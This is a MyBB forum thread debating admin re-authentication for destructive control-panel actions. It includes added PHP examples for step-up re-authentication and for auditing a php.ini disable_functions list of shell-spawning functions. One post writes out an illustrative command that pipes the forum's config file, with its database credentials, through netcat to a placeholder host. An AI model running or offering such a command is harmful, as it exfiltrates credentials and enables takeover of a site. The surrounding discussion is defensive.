MyBB Community Forums

Full Version: Admin Re-Authentication
The administrator should have to re-authenticate whenever they do certain admin actions like deleting a forum, accessing the backups page, etc.

Maybe, guard the command-line tool with a set of credentials too?
Guarding the command line tool doesn't really make much sense IMO when you could just guard access with standard filesystem ACLs and OS permissions.
Like Euan said, I can't see much value in protecting the CLI tool with credentials. You'd need SSH access in the first place to even use it. However your other point about forcing more reauthorizations for actions within the ACP does seem reasonable.
You don't necessarily need SSH access. Remember, PHP can run shell commands, as can other programs.
MySQL is guarded with credentials when you invoke it, with the exception of when you're running a shell command as root, but if an adversary has access to root, then you have bigger problems.

https://en.wikipedia.org/wiki/Confused_deputy_problem
I don't really see the point in this.

If someone gains access to your password then having to type it in again won't stop them.

Suppose we went with a verification code sent to a mobile or email...
That would just be a pain in the butt for anyone trying to set up a new forum if they had to keep getting new codes every time they did an action or every certain amount of time.
Or suppose something bad happened and you needed to lock down the board quickly: having to spend extra time waiting for a code to come in, type it in, then do what is necessary just wastes time and increases potential problems.
Also, in response to Euan saying to use file permissions, the more things admins have to secure and the more arcane numbers they have to deal with, the higher the chances of them making a mistake. They might not even necessarily know how permissions work and are just copying it off Stack Overflow or something.

VirusZero, we already have measures for further securing the ACP like the Admin PIN and Admin 2FA. These help to mitigate the damage caused by security exploits. In a perfect world, security exploits wouldn't exist, but a SQL injection for instance can cause a lot of damage.

In addition, re-entering your password during particularly destructive tasks like deleting a forum can act as an "Are you sure about this?" and would make it *feel* like a heavy decision. The same argument was used for admins reading PMs in Discourse, with the ability to casually read PMs being contrasted against a screen making them think twice, especially when every PM read is logged.
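The "sudo mode" idea described above, as an added example written for this thread (it is not MyBB code and does not use MyBB's session or admin APIs): a sensitive action is allowed only when the admin has re-entered their password within a short window, and the grant is consumed by the action so each destructive step prompts again. The action names, session key, window length and function names are all hypothetical.

```php
<?php
// Added example (not MyBB code): step-up re-authentication for destructive
// admin actions. All names and the 300-second policy are assumptions.

const REAUTH_MAX_AGE = 300; // seconds a re-authentication grant stays valid

// Illustrative list of actions from the thread that should require a fresh password.
const SENSITIVE_ACTIONS = ['forum.delete', 'backups.view', 'user.purge'];

/**
 * Verify the password again and record the time of the grant in the session.
 * password_verify() does the hash comparison in constant time.
 */
function reauthenticate(array &$session, string $password, string $storedHash, int $now): bool
{
    if (!password_verify($password, $storedHash)) {
        $session['reauth_at'] = null; // a failed attempt clears any earlier grant
        return false;
    }
    $session['reauth_at'] = $now;
    return true;
}

/**
 * Decide whether $action may run with the current session state.
 * Non-sensitive actions always pass; sensitive ones need a grant younger
 * than REAUTH_MAX_AGE. A grant timestamped in the future is treated as invalid.
 */
function actionAllowed(array $session, string $action, int $now): bool
{
    if (!in_array($action, SENSITIVE_ACTIONS, true)) {
        return true;
    }
    $at = $session['reauth_at'] ?? null;
    if ($at === null) {
        return false;
    }
    return $now >= $at && ($now - $at) <= REAUTH_MAX_AGE;
}

/**
 * Run a destructive handler only with a recent grant, then consume the grant
 * so the next destructive action has to prompt for the password again.
 */
function runSensitive(array &$session, string $action, int $now, callable $handler): string
{
    if (!actionAllowed($session, $action, $now)) {
        return "denied: re-authentication required for $action";
    }
    $session['reauth_at'] = null; // one grant, one action
    return $handler();
}

// Constructed demo data: the hash is generated at runtime, so no real hash is embedded.
$storedHash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
$session = ['reauth_at' => null];
$now = time();
$deleteForum = fn() => 'forum deleted';

echo runSensitive($session, 'forum.delete', $now, $deleteForum), PHP_EOL; // denied: no grant yet
reauthenticate($session, 'wrong password', $storedHash, $now);
echo runSensitive($session, 'forum.delete', $now, $deleteForum), PHP_EOL; // denied: wrong password
reauthenticate($session, 'correct horse battery staple', $storedHash, $now);
echo runSensitive($session, 'forum.delete', $now, $deleteForum), PHP_EOL; // forum deleted
echo runSensitive($session, 'forum.delete', $now, $deleteForum), PHP_EOL; // denied: grant consumed
echo runSensitive($session, 'forum.view', $now, fn() => 'forum listed'), PHP_EOL; // allowed: not sensitive
```

The time window only bounds the gap between the password prompt and the action that follows it; consuming the grant is what makes each destructive action a separate decision, which is the "think twice" effect described above. Logging each grant alongside the action it unlocked gives the audit trail the Discourse comparison mentions.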
Gonna have to agree with VirusZero there. I can't see it helping much with security and it sounds like a pain if you're doing a lot of actions.

(2017-12-09, 10:54 PM)Azah Wrote: You don't necessarily need SSH access. Remember. PHP can run shell commands. As can other programs.
MySQL is guarded with credentials when you invoke it
If the attacker can run shell commands with access to the forum directory, I'd say most bets are off. I mean, it's not like they can't just get your DB credentials:
system('cat inc/config.php | nc evil-host');
Admins are human too. One area might have adequate permissions, another may not, who really knows.
But once you're going through 15 different zones which need 15 different sets of permissions, it's easy for someone to slip up. This is one of MyBB's biggest and most fundamental security flaws: mistakes and misconfigurations are a major source of compromises, although here's hoping that Docker helps with that.

It could be executable and not readable, who really knows. Anything could be anything, it gets more complicated when someone needs to contrast world visibility to group visibility and so on.

And it really depends on how the shell command is being run and how it's mangled. For instance, one idea for 2.0 was to invoke Node to build the TypeScript, etc. on behalf of MyBB, as PHP is obviously incapable of running JavaScript. It's not inconceivable that a carefully crafted string could get passed as a valid "filename" despite protections.

I wouldn't put it past there being a WordPress plugin or something which does that.
There's always a balance between how secure will this actually make things and how much will it impact the user. What's the point of making things so secure that they need 20 different passwords to do anything if they decide to go elsewhere? Or worse they actively try to circumvent the system. (Like when Vista came out with the UAC, people just clicked yes until it went away.)
And in this case I think having to enter a password or system generated code in won't make things more secure.

As for SQL injections/exploits, sure they can be a risk. But there's really no way to perfectly guard against them, since if they can get something into the system they can often bypass any requirements anyway. Having to enter another code won't matter if they can inject an SQL query directly to delete something or add a new root admin account. The extra code in this case only affects users going through the Admin Control Panel, not those who go through SQL itself.

Plus isn't it enough that, say for deleting users, it asks:
"Are you sure you want to do this? (This can't be undone)"
I haven't deleted a forum (I usually just repurpose them) so I wouldn't be surprised if it does the same thing. (Or if not then it wouldn't take that much effort to add that extra step in.) Having that kind of thing for those destructive acts equates to the same thing. But it would not add the inconvenience of having to re-enter a password or a code each time.
Quote:You don't necessarily need SSH access. Remember. PHP can run shell commands.

In which case your idea wouldn't prevent that if they insert a shell script. On my servers I disable functions related to shells in the php.ini.

Quote:But once you're going through 15 different zones which need 15 different sets of permissions, it's easy for someone to slip-up. This is one of MyBB's biggest and most fundamental security flaws, mistakes and misconfigurations are a major source of compromises

I disagree. First, you shouldn't have that many admins. Second, you should be careful what permissions you give them.

A certain level of caution has to be shown by the forum owner in setting Admins. I think what you're asking is overkill and an unnecessary burden to the team.

Any rogue admin can cause the forum a lot of destruction.

Quote:The administrator should have to re-authenticate whenever they do certain admin actions like deleting a forum, accessing the backups page, etc.

What stops the rogue admin from going into the forums and mass-deleting threads with just a few clicks? As for db-backups.php in the ACP, I just delete it.
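The php.ini hardening mentioned earlier in this post ("I disable functions related to shells in the php.ini") is the `disable_functions` directive. As an added example for this thread, not code from MyBB or from the poster, here is a small PHP check that parses a `disable_functions` value and reports which process-spawning built-ins it leaves enabled, so an admin can confirm the directive actually covers the functions that matter. The list of shell-related functions is the one I would audit; the sample directive values are constructed.

```php
<?php
// Added example (not MyBB code): audit a php.ini "disable_functions" value.

// Built-in PHP functions that can spawn a shell or child process. pcntl_exec
// only exists when the pcntl extension is loaded; listing it is harmless.
const SHELL_FUNCTIONS = [
    'exec', 'passthru', 'shell_exec', 'system',
    'proc_open', 'popen', 'pcntl_exec',
];

/** Parse the comma-separated directive value into a set of lowercase names. */
function parseDisabledFunctions(string $directive): array
{
    $names = [];
    foreach (explode(',', $directive) as $name) {
        $name = strtolower(trim($name));
        if ($name !== '') {
            $names[$name] = true;
        }
    }
    return $names;
}

/** Return the shell-related functions NOT covered by the directive. */
function stillEnabledShellFunctions(string $directive): array
{
    $disabled = parseDisabledFunctions($directive);
    return array_values(array_filter(
        SHELL_FUNCTIONS,
        fn(string $f) => !isset($disabled[$f])
    ));
}

// Constructed sample values, written the way they would appear in php.ini.
$samples = [
    'partial'  => 'exec,system',
    'complete' => 'exec, passthru, shell_exec, system, proc_open, popen, pcntl_exec',
];

foreach ($samples as $label => $value) {
    $gaps = stillEnabledShellFunctions($value);
    echo "[$label] disable_functions = $value\n";
    echo $gaps
        ? '  still enabled: ' . implode(', ', $gaps) . "\n"
        : "  all listed shell functions are disabled\n";
}

// The same check against the running interpreter's configuration. ini_get()
// returns false when the directive is unset, hence the string cast.
$liveGaps = stillEnabledShellFunctions((string) ini_get('disable_functions'));
echo "[live] still enabled: " . ($liveGaps ? implode(', ', $liveGaps) : 'none') . "\n";
```

Disabling `shell_exec` also disables the backtick operator, which is the same function in disguise. The directive is per-interpreter, so a CLI php.ini and the web server's php.ini (FPM or mod_php) each need checking; the `[live]` line above only reports on whichever one executed the script.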